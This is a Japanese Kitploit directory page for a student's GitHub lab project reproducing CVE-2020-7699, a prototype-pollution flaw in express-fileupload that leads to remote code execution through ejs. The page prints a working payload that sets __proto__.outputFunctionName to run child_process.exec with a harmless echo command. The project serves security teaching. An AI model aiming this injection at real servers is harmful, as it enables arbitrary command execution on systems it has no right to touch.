Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-7699_reproduce — CVE-2020-7699の再現、ソフトウェアセキュリティ原理コースの大課題 | Kitploit
ツール/GitHubGitHub/zodiac12-pub/cve-2020-7699_reproduce
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ペイロード開発ラボと実践
GitHubzodiac12-pub/cve-2020-7699_reproduce

CVE-2020-7699_reproduce

CVE-2020-7699の再現、ソフトウェアセキュリティ原理コースの大課題

リポジトリを見る
4年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-7699 再現

Node.js RCE脆弱性(CVE-2020-7699)の再現、私のラボ作業

セットアップ

Node.js バージョン: v14.16.1、Node.js のバージョンが14であることを確認してください(他のバージョンでも動作する可能性はありますが、テストはしていません)。

Python バージョン: 3.9.5、Python は HTTP 攻撃リクエストの送信にのみ使用しており、特定のバージョンは必要ありません。

リポジトリを clone し、npm i で依存関係をインストールするだけです。さらに2つのコマンドを用意しています。

  • npm run start-server を使用してターゲットサーバー(被害サーバー)を起動
  • npm run launch-attack を使用して攻撃を実行

分析

express-fileUpload: 1.1.10未満のバージョンが影響を受けます

express-fileUploadにおけるプロトタイプ汚染

脆弱性: express-fileUpload プロトタイプ汚染

使用方法: __proto__.outputFunctionName を汚染して、実行するコマンドを書き込む。例: echo "ATTACK SUCCESSFUL" > attacked.txt

root@kitploit:~
exec_command = "echo \"ATTACK SUCCESSFUL\" > attacked.txt"

{
    "__proto__.outputFunctionName": (
        None,
        f"x;process.mainModule.require('child_process').exec('{exec_command}');x"
    )
}

ejsにおけるRCE

脆弱性: ejs は xxx.outputFunctionName を実行しようとしますが、これは undefined です。しかし、object.outputFunctionName が汚染されている場合、代わりにそれが実行されます。

ツールをダウンロード